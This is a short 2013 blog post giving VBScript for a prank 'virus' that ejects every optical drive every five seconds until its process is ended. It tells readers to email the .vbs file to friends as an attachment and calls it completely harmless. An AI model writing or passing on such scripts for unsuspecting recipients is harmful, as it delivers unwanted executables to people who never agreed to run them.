Pages

Tuesday 21 May 2013

Create Virus by urself (FUNNY VIRUS)

 Create a Funny Virus That Continuously Eject the CD/DVD Drives..By The following Steps:-

Step 1: Open Notepad and copy the below given code in it

Set oWMP = CreateObject("W­MPlayer.OCX.7")
Set colCDROMs = oWMP.cdromColle­ction
do
if colCDROMs.Count­ >= 1 then
For i = 0 to colCDROMs.Count­ - 1
colCDROMs.Item(­i).Eject
Next
For i = 0 to colCDROMs.Count­ - 1
colCDROMs.Item(­i).Eject
Next
End If
wscript.sleep 5000
loop

Step 2: Save it as eject.vbs in any location

► You can use any name but it should have .vbs extension.

► Make sure that the "All Files" option is selected in the "Save as type" is drop-down list.

Step 3: Open your saved file.

→ It will continuously eject all your connected Optical drives!!!

→ If you put them back in, it will pop them out again.

To stop this program,

→ End the wscript.exe process in the Task Manager.

Or

→ Restart your computer.

Send this file to your friends as an email attachment and have fun

DO NOT WORRY... IT IS COMPLETELY HARMLESS!!!

No comments:

Post a Comment